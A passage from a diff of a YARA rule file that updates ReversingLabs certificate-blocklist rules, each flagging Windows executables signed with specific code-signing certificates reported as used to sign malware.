pe.signatures[i].serial=="40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" and 1641833688<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Incar LLC" and (pe.signatures[i].serial=="00:be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" or pe.signatures[i].serial=="be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34") and 1602530730<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "500c9604-cc07-52b1-8c46-09894d132205" + id = "1eed6f30-0648-5b8e-81ff-9f3af0f1c91d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12140-L12156" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "47735267e9a0fb8107f6c4008bacc8aada1705f6714a0447dacc3928fc20cad6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6160-L6178" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9e23ff26d3e1ea181e48fc23383e3717804858bc517a31ec508fa0753730c78e" score = 75 quality = 90 tags = "INFO, FILE" @@ -17037,22 +36828,22 @@ rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "StackUp ApS" and pe.signatures[i].serial=="04:00:c7:61:4f:86:d7:5f:e4:ee:3f:61:92:b6:fe:da" and 1626393601<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABEL RENOVATIONS, INC." and (pe.signatures[i].serial=="00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" or pe.signatures[i].serial=="f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7") and 1602542033<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2e799dd9-d143-55a7-9d07-d5f289477b24" + id = "7f7ecbcd-7a92-526d-99a8-d849fffa19cb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12158-L12176" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "425126b90fe2ab7c1ec7bf2fd5a91e4438a81992f20f99ed87ec62e7f20043cd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6180-L6196" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7030c122905105c72833cfcb41692bd9a67cf456e3309afce0b8f9e65c6aa5c1" score = 75 quality = 90 tags = "INFO, FILE" @@ -17062,22 +36853,22 @@ rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"VERONIKA 2\" OOO" and (pe.signatures[i].serial=="00:e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" or pe.signatures[i].serial=="e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68") and 1563148800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LEVEL LIST SP Z O O" and pe.signatures[i].serial=="0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" and 1603036100<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4b27c958-58f1-5fbd-8a39-aedfe4dafe39" + id = "5b2876a2-8dfa-5456-a615-4ea69df53422" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12178-L12196" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2c47166f02c7f94bb4f82296e3220ff7ca3c6c53566d855b2fe77cb842a5fb43" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6198-L6214" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f84568cfe6304af0307a34bfed6dd346a74e714005b5e6f22a354b14f853ec65" score = 75 quality = 90 tags = "INFO, FILE" @@ -17087,22 +36878,22 @@ rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GAS Avto, d.o.o." and (pe.signatures[i].serial=="00:b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" or pe.signatures[i].serial=="b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05") and 1615507200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Umbrella LLC" and pe.signatures[i].serial=="12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" and 1599181200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a93b0a98-cfec-5e32-9fd8-b3d6c4353558" + id = "088f0f98-328b-50fa-b1e4-1d80023b3c09" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12198-L12216" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fc840c0b37867c3b0aa80d4dc609feaaab77d3f0c6f84c8bb2ea7c5a6461ebb8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6216-L6234" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7ed87a03f20872669369cc3cad4eae40ba597f06222194bd67262c094083ec1" score = 75 quality = 90 tags = "INFO, FILE" @@ -17112,22 +36903,22 @@ rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Casta, s.r.o." and (pe.signatures[i].serial=="00:e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" or pe.signatures[i].serial=="e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18") and 1647302400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Olymp LLC" and (pe.signatures[i].serial=="00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" or pe.signatures[i].serial=="d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4") and 1601895290<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "df6e1403-c300-5d97-b57d-dc70d61b2229" + id = "ccb4da10-3178-5d8f-be17-9c689e794418" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12218-L12234" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "67a975f2806825bf0da27fcaf33c2ff497fe9bb2af12c22ff505b49070516960" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6236-L6252" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "feeb1710bd5b048c689a2e45575529624cd1622dcc73db8fe7de6c133fdc5698" score = 75 quality = 90 tags = "INFO, FILE" @@ -17137,22 +36928,22 @@ rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Protover LLC" and pe.signatures[i].serial=="42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" and 1621900800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Service lab LLC" and pe.signatures[i].serial=="53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" and 1599181200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "73f4d6e2-6924-59fa-8ec1-305f2d5dc5a3" + id = "ce437144-0f99-5c41-8d15-edeceb34de4d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12236-L12254" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "302e2d6b31ca5c2c33c4ec7294630fd88a9c40f70ddecdc606ccff27b24e1cd4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6254-L6270" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1cbdf39a873c83d2b55723215fb4930a3ce23b6cab2d71a6cd5f16b2721e30f9" score = 75 quality = 90 tags = "INFO, FILE" @@ -17162,22 +36953,22 @@ rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x83\\xB4\\xE5\\xB7\\x9E\\xE8\\x9C\\x97\\xE7\\x89\\x9B\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" or pe.signatures[i].serial=="af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3") and 1629676800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Nordkod LLC" and pe.signatures[i].serial=="0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" and 1600650000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1841bbd1-4c7a-5b89-8c63-58d8a3ae1cef" + id = "daae5f42-59ff-5838-9444-93357eaa9d60" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12256-L12272" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1795812d4daa458b157280cac7a9b13e9b67a2d78eac077691bbce2bf8aeec34" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6272-L6288" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "17996dd0ec81623dbd4eeea98f9bbe37c11c911ca840833ecb9301bb0a9ddb52" score = 75 quality = 90 tags = "INFO, FILE" @@ -17187,22 +36978,22 @@ rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RotA Games ApS" and pe.signatures[i].serial=="38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" and 1613088000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ARTBUD RADOM SP Z O O" and pe.signatures[i].serial=="0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" and 1601254800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fd19ce61-056b-549a-946e-72543ff1f7c0" + id = "f91ecc17-7406-552a-8864-c9e1657a5ca9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12274-L12292" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "eb5288d2b96ff7a7783c2b2b02f9f1168784352ed84ad6463dce00c12daca6cb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6290-L6308" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cffc234be78446191dd5f5990db9f17c7e28eeaa3e16f1eb8ad4ed1e58fdc25e" score = 75 quality = 90 tags = "INFO, FILE" @@ -17212,22 +37003,22 @@ rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ANKADA GROUP, d.o.o." and (pe.signatures[i].serial=="00:bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" or pe.signatures[i].serial=="bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09") and 1616630400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Elite Web Development Ltd." and (pe.signatures[i].serial=="00:6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" or pe.signatures[i].serial=="6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff") and 1600176940<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6e8ffb39-d00d-54ca-a4be-68f6dd92d798" + id = "c0796bc3-96cd-5d12-a0ee-97d8ed4a3076" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12294-L12310" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "12235e324b92b83e9cfaed7cbcff5d093b8b1d7528dd5ac327159cde6e9a4d1f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6310-L6326" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "40c80d3b6bedb0b3454e14501745a6e82b6ea9ac202748867a2e937fb79c6f6c" score = 75 quality = 90 tags = "INFO, FILE" @@ -17237,22 +37028,22 @@ rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Everything Wow s.r.o." and pe.signatures[i].serial=="49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" and 1594252800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MUSTER PLUS SP Z O O" and pe.signatures[i].serial=="04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" and 1601427600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f6d0808d-4748-5b9f-9be2-7753292a6209" + id = "0e7e235e-3f0b-5396-9c19-9336d9cbb95a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12312-L12328" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "978f05f86734c63afe1e5929a58f3cfff75ef749ffda07252db90b6fe12508ec" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6328-L6346" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a8d2a92b44cdd7b123907a6a77ba0fc9fde4961f9ac846b36f1e87730a1efae6" score = 75 quality = 90 tags = "INFO, FILE" @@ -17262,22 +37053,22 @@ rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and pe.signatures[i].serial=="25:c6:db:ce:3d:54:99:f6:5d:9d:f1:6e:90:07:46:5d" and 1626566400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALEXIS SECURITY GROUP, LLC" and (pe.signatures[i].serial=="00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" or pe.signatures[i].serial=="b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa") and 1574914319<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ac5ac6d7-898b-5547-8d35-a483f20edcd6" + id = "2587d30d-e9c8-599c-9cc4-4d4a7aa83c34" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12330-L12348" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9b678e9fb1e1eda3ac8e027b5e449af446de4379fea46ef7ff820240c73795ee" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6348-L6366" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1255cef74082c9cad41ac8e7d62e740f69e6ba44171bb45655a68ee5db204e57" score = 75 quality = 90 tags = "INFO, FILE" @@ -17287,22 +37078,22 @@ rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" or pe.signatures[i].serial=="bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52") and 1623801600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "APP DIVISION ApS" and (pe.signatures[i].serial=="00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" or pe.signatures[i].serial=="b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14") and 1603328400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6b6958c0-3b43-5c17-9354-d0e2326b97fd" + id = "3e451a5a-835b-572d-ab17-ff52d3614a86" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12350-L12368" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1cf0b6855269a771447a0b38f4a02996b6527d7df4b143b69598ed591719ca0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6368-L6386" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f560e6f4a65eaac8db1d8accb0748de17048e66ccf989468e6350a3ec1d70dc8" score = 75 quality = 90 tags = "INFO, FILE" @@ -17312,22 +37103,22 @@ rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" or pe.signatures[i].serial=="bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24") and 1628553600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THRANE AGENTUR ApS" and (pe.signatures[i].serial=="00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" or pe.signatures[i].serial=="ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23") and 1603369254<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f7619c39-33a0-5f99-b911-9d8a61a4683d" + id = "4fcd4e89-658c-593b-8f94-edd5df19da6e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12370-L12386" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a61bcc4a90a75a429366e3f93929005b67325eccc6cad3df6b7a0c3692597828" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6388-L6404" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9f1cc61b944974696113912bc1d1a0b45b9911fa4d6de382a48c0d22d2d20953" score = 75 quality = 90 tags = "INFO, FILE" @@ -17337,22 +37128,22 @@ rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "1105 SOFTWARE LLC" and pe.signatures[i].serial=="5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" and 1679061408<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hillcoe Software Inc." and pe.signatures[i].serial=="01:4a:98:d6:97:b4:4f:43:de:d2:1f:18:eb:6a:d0:ba" and 1605364760<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : 